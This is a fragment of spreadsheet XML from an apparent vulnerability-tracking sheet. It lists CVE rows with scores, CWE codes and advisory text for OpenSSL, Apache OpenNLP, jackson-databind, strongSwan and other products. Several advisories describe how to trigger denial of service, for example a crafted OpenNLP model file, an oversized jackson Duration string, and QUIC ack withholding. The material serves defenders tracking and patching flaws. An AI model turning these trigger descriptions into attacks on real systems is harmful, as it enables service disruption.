        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63075</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K460" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>Issue summary: When OpenSSL processes QUIC traffic from a peer that repeatedly
sends ack-eliciting packets while not acknowledging ACK-only responses, the
QUIC stack can retain ACK-only packet metadata for the lifetime of the
connection.
Impact summary: A remote peer that can complete a QUIC handshake can
cause connection-scoped memory growth which may lead to Denial of Service
through memory exhaustion, especially with sustained traffic or many concurrent
QUIC connections.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: When the OpenSSL QUIC stack sends an ACK-only packet,
there is no requirement by the QUIC protocol that the peer will acknowledge
that ACK-only packet (i.e. it is itself not ack-eliciting). However, the OpenSSL
implementation stores the metadata about the ACK frames regardless.
In and of itself that's ok, but if a malicious peer establishes a connection, and
then drives the connection such that ACK-only packets are forced from the 
OpenSSL implementation peer (i.e., by sending numerous PING frames),
and then withholding any subsequent acks for ack-eliciting data, like
legitimate data, said malicious peer can force inappropriate memory growth
on the OpenSSL peer, potentially leading to a Denial of Service.
The fix is to ensure that we account for the transmission of the ACK-only
packet in the packet histories high and low watermark without actually storing
the ACK-only packet metadata itself.
FIPS impact: no
The OpenSSL FIPS module is not affected as the QUIC code is
outside the FIPS module boundary.</t>
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63075</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63076</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K461" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMP password based protection verification only
checks whether the protectionAlg parameter was not NULL and not its
ASN.1 type, before treating it as a PBMParameter. A crafted message can
contain a parameter of a different type, which is then dereferenced as an
invalid pointer.
Impact summary: A remote, unauthenticated attacker can crash an application
acting as a CMP server that accepts PBM-protected messages, or a CMP client
talking to a malicious or intercepted CMP server, resulting in a Denial of
Service.
CWE: CWE-476: NULL Pointer Dereference
Description: When verifying the password-based MAC protection of a CMP
message, OpenSSL library reads the protectionAlg algorithm parameter with
X509_ALGOR_get0(), which returns both the parameter type and its value
pointer. The value is then cast to an ASN1_STRING and treated as the
expected PBMParameter after only checking that pointer is not NULL. The
parameter type returned by X509_ALGOR_get0() was never consulted.
This happens during protection verification, before any MAC is computed, so
no knowledge of the PBM shared secret is required; the only precondition is
that PBM verification is reachable. On the server side this is reached from
OSSL_CMP_SRV_process_request() for any application that stands up a CMP
server accepting PBM-protected messages, and on the client side from CMP
response validation against a malicious or on-path (MITM) server. The
reliable consequence is a denial of service; there is no memory disclosure,
no controlled memory write, and no path to code execution. CMP is a
specialized feature that an application must explicitly enable.
FIPS impact: no
As the CMP code lives outside the FIPS module boundary, no FIPS modules
are affected by this CVE.</t>
        </is>
      </c>
      <c r="S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63076</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67211</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>OOM Denial of Service via Unbounded Map Pre-Sizing in Apache OpenNLP SymSpellModelSerializer
Versions Affected: 
- 3.0.0-M4
- 3.0.0-M5
(The opennlp-spellcheck extension was introduced in 3.0.0-M4. Releases 1.x and 2.x do not contain the affected code.)
Description:
The SymSpellModelSerializer.create() method reads two 32-bit signed integer count fields (unigramCount and bigramCount) from a binary SymSpell model stream and passes each value directly to LinkedHashMap.newLinkedHashMap() after validating only that it is non-negative. No upper bound is applied, so the count is fully attacker-controlled when the model file originates from an untrusted source.
A crafted .bin model file in which either count field is set to Integer.MAX_VALUE (or any value large enough to exhaust the available heap) causes the map to be pre-sized to a capacity of 2^30 entries. The oversized backing array is allocated on the first put() into that map, requesting 4–8 GB depending on whether compressed oops are in effect, and the load fails with an OutOfMemoryError. Because the count fields sit immediately after a fixed-size header (magic, format version, three UTF strings, the configuration fields, and the edit-distance identifier) the attacker pays no meaningful size cost to weaponize a payload: a file of well under 100 bytes plus a single real entry is sufficient to crash a JVM that loads it.
Any code path that deserializes a SymSpell model is affected, including SymSpellModels.deserialize(InputStream), SymSpellModels.fromBytes(byte[]), classpath model loading via SymSpellModelResolver.resolveByLanguage(String), the CorrectTextTool command-line tool, and model-archive loading through the registered ArtifactSerializer. The opennlp-spellcheck extension ships in the official OpenNLP binary distribution.
The practical impact is denial of service against processes that load SymSpell model files from untrusted or semi-trusted origins.
Mitigation:
- 3.x users should upgrade to 3.0.0-M6.
Note: The fix applies an upper bound to both count fields, checked before the map is pre-sized; counts that are negative or exceed the bound cause an IOException to be thrown and the read to fail fast with no large allocation. The bound is the existing AbstractModelReader.MAX_ENTRIES limit introduced earlie, which the current change promotes to public visibility so that serializers implementing their own binary format can share it. The default bound is 10,000,000, which is well above the entry counts of legitimate SymSpell dictionaries but far below any value that would threaten heap exhaustion. Deployments that legitimately need to load larger dictionaries can raise the limit at JVM startup by setting the OPENNLP_MAX_ENTRIES system property to the desired positive integer (e.g. -DOPENNLP_MAX_ENTRIES=50000000); invalid or non-positive values fall back to the default. Note that this property is shared with the model-reader limit and raising it relaxes both.
Users who cannot upgrade immediately should treat all SymSpell .bin model files as untrusted input unless their provenance is verified, and should avoid loading models supplied by end users or fetched from third-party repositories without integrity checks.</t>
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67211</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>36c7be3b-2937-45df-85ea-ca7133ea542c</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>jackson-databind binds a JSON string to a javax.xml.datatype.Duration or javax.xml.datatype.XMLGregorianCalendar field by passing the raw string verbatim to DatatypeFactory.newDuration(value) or newXMLGregorianCalendar(value) in CoreXMLDeserializers.Std._deserialize. These deserializers are registered by default with no opt-in, so a plain ObjectMapper or JsonMapper with no polymorphic typing and no special configuration reaches this path. The XML Schema lexical grammar permits numeric components of arbitrary length, which the JDK materializes through the native BigInteger(String) and BigDecimal(String) constructors, both quadratic in digit count. Because the digits sit inside a JSON string token rather than a JSON number token, jackson-core's StreamReadConstraints.maxNumberLength guard never applies; jackson's own NumberDeserializers call validateIntegerLength or validateFPLength before parsing a stringified number, but the XML datatype deserializer omits that pre-check. An unauthenticated attacker can therefore submit a single request of a few megabytes, such as a Duration value consisting of the letter P followed by several million digits and the letter Y, and force tens of seconds to several minutes of single-threaded CPU work; a handful of concurrent requests can saturate a server's worker threads. This affects com.fasterxml.jackson.core:jackson-databind from 2.0.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2.</t>
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71641</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>An issue in ZJU-FAST-Lab EGO-Planner-v2 All versions up to commit 5c99a95880401e2599638d567abc0e240396cb42 allows an attacker to cause a denial of service via thenteraction between traj_server, poscmd_2_odom, and the EGOReplanFSM emergency recovery logic</t>
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71641</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71646</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>An issue in Robotics-STAR-Lab (SYSU STAR Group) RACER Tested affected version: commit abcdef1234567890 allows an attacker to cause a denial of service via the FastExplorationFSM::optTimerCallback() in swarm_exploration/exploration_manager/src/fast_exploration_fsm.cpp</t>
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71646</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K466"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66" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73785</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-241</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall Federation Agent and Proxy could allow a remote unauthenticated attacker to cause a denial of service (DoS).</t>
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73785</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77108</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77807</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 11.0.4 via the `user[name]` Parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Exploitation requires "Embed images" option in AcyMailing configuration being enabled.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77807</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78130</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.2.0 through 6.0.7 has a NULL pointer dereference in the x509 plugin's attribute certificate parser.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78130</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78132</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.1.3 through 6.0.7 has an infinite loop in the x509 plugin's attribute certificate parser for ietfAttrSyntax.</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78132</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78133</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 6.0.0 through 6.0.7 has a use-after-free in IKEv2 rekeying collision handling.</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78133</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78480</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R473"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S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78480</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79393</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
